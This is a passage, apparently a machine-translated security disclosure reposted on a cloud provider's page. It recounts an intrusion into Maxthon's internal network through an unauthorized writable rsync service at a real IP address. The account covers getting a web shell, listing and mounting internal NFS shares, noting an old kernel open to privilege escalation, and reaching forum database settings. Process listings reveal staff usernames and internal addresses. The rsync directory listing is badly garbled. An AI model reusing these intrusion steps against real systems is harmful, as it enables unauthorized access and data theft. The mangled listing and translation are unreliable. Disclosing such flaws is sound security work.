Ao you's internal network is not completely roaming (a large number of internal and external network source code can be leaked)

Source: Internet
Author: User

Ao you's internal network is not completely roaming (a large number of internal and external network source code can be leaked)

I was wondering if I could prove that I had access to the data of the proud game users. The Administrator found that I only had access to the bbs users.

Rsync unauthorized access

Writable
 

Rsync 60.28.210.24: I. mx/drwxrwxr-x 8192 19:10:44. -rw-r -- 6036 13:30:47 build.txt-rw-r -- 31 19:10:23 conf. php-rw-r -- 1406 2013/10/21 13:30:49 favicon. ico-rw-r -- 7166 2014/01/13 15:40:28 feedback.htm-rw-r -- 55790 2014/01/13 15:40:28 index.htm-rw-r -- 132 13:31:34 index.so.htm-rw-r -- r -- 137 13:31:34 index.v3.html rwxrwxrwx 31 20 14/02/20 17:52:51 key-rw-r -- 30 2013/10/21 13:31:37 test. php-rw-r -- 214 2013/05/30 15:00:17 ??? ν ???. Url-rw-r -- 214 17:35:44 ?? \ #2022 ?????? #212 ?? \ #227 ¥. url-rw-r -- 214 13:31:39? #202? You? #212? #227 ?. 23:38:53 branchdrwxr-xr-x 8192 running 23:38:55 chajiandrwxr-xr-x 8192 running 16:14:21 cssdrwxr-x 8192 15:59:24 datadrwxr-xr-x 8192 11:34:51 datadrwxr-xr-x 8192 14:46:07 decent_htmldrwxr-xr-x 8192 23:43:03 do_not_deletedrwxr-xr-x 8192 19:17:48 8192 17:36:03 I. maxthon. cndrwxr-xr-x 8192 23:42:36 I. mx_updatedrwxr-xr-x 8192 14:46:08 I. 10:52:17 imagesdrwxr-xr-x 8192 running 15:59:24 jsdrwxr-xr-x 8192 running 17:38:46 macdrwxr-xr-x 8192 running 15:31:19 minidrwxr-xr-x 8192 14:46:20 sounddrwxr-xr- x 8192 18:05:43 testdrwxr-xr-x 8192 2013/05/20 18:05:43 tuandrwxr-xr-x 8192 18:05:43 am-xr-x 8192 18:05:43 am-xr-x 8192 18:05:43 am-xr-x 8192 am-x 18:05:43 v3betadrwxr-xr-x 8192 19:08:28 widget



These files are not found on the web. I. mx assumes that they are I .maxthon.cn.

Ping I .maxthon.cn and find that the ip address is incorrect.

Decisively bind the host to I .maxthon.cn 60.28.210.24

The current directory file getshell is successfully accessed.
 

 

Analysis found

Glusterfs #192.168.0.166:/other

504G 160G 320G 34%/mnt/nfs

Nfs mount directory

A large number of source code leaks
 


 

[/]$ showmount -e 192.168.0.166Export list for 192.168.0.166:/other */bbs   *



We found that there is still a bbs directory under 166.
 

/]$ uname -aLinux cms13393 2.6.18-128.el5 #1 SMP Wed Jan 21 10:41:14 EST 2009 x86_64 x86_64 x86_64 GNU/Linux



Privilege Escalation due to low kernel version on the local machine
 



Nfs mounting

mount -t nfs 192.168.0.166:/bbs /tmp/nfs


 



Bbs.maxthon.cn is successfully mounted to the Forum.

View Database Configuration connectable
 


The Administrator is checking the log and stops the test submission.

root     28678  0.0  0.0  58896   536 pts/0    S+   21:50   0:00 tail -f mx.13393/access_20141223.logroot     28703  0.0  0.0  88936  3252 ?        Ss   21:50   0:00 sshd: root [priv]sshd     28704  0.0  0.0  64096  1460 ?        S    21:50   0:00 sshd: root [net] root     28712  0.0  0.0  10456   872 ?        R    21:50   0:00 ps -auxroot     30487  0.0  0.0 102004   916 ?        S    Feb09   0:00 crondroot     30488  0.0  0.0   8696   828 ?        Ss   Feb09   0:00 /bin/bash -c /usr/local/php/bin/php -q /data/html/i.mx/i.mx_update/pc/novel/cron.php > /dev/null 2>&1root     30511  0.0  0.1  91052  4448 ?        S    Feb09   0:03 /usr/local/php/bin/php -q /data/html/i.mx/i.mx_update/pc/novel/cron.phpsh-3.2# whosongqi   pts/0        Dec 23 21:42 (10.0.8.249)skyyuan  pts/1        Dec 23 21:44 (10.0.8.249)

 

Solution:

Enhanced Filtering

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.